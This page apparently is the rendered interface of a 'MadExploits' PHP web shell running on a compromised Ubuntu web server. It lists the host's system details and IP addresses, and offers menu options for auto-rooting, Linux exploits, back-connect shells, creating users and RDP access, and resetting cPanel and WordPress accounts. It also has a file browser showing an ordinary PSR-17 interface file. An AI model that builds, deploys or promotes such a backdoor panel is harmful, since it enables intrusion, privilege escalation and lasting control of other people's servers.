Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.147.79.7
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amply /
vendor /
psr /
http-factory /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
RequestFactoryInterface.php
499
B
-rw-rw-r--
ResponseFactoryInterface.php
546
B
-rw-rw-r--
ServerRequestFactoryInterface....
927
B
-rw-rw-r--
StreamFactoryInterface.php
1.38
KB
-rw-rw-r--
UploadedFileFactoryInterface.p...
1.08
KB
-rw-rw-r--
UriFactoryInterface.php
325
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : UploadedFileFactoryInterface.php
<?php namespace Psr\Http\Message; interface UploadedFileFactoryInterface { /** * Create a new uploaded file. * * If a size is not provided it will be determined by checking the size of * the file. * * @see http://php.net/manual/features.file-upload.post-method.php * @see http://php.net/manual/features.file-upload.errors.php * * @param StreamInterface $stream Underlying stream representing the * uploaded file content. * @param int $size in bytes * @param int $error PHP file upload error * @param string $clientFilename Filename as provided by the client, if any. * @param string $clientMediaType Media type as provided by the client, if any. * * @return UploadedFileInterface * * @throws \InvalidArgumentException If the file resource is not readable. */ public function createUploadedFile( StreamInterface $stream, int $size = null, int $error = \UPLOAD_ERR_OK, string $clientFilename = null, string $clientMediaType = null ): UploadedFileInterface; }
Close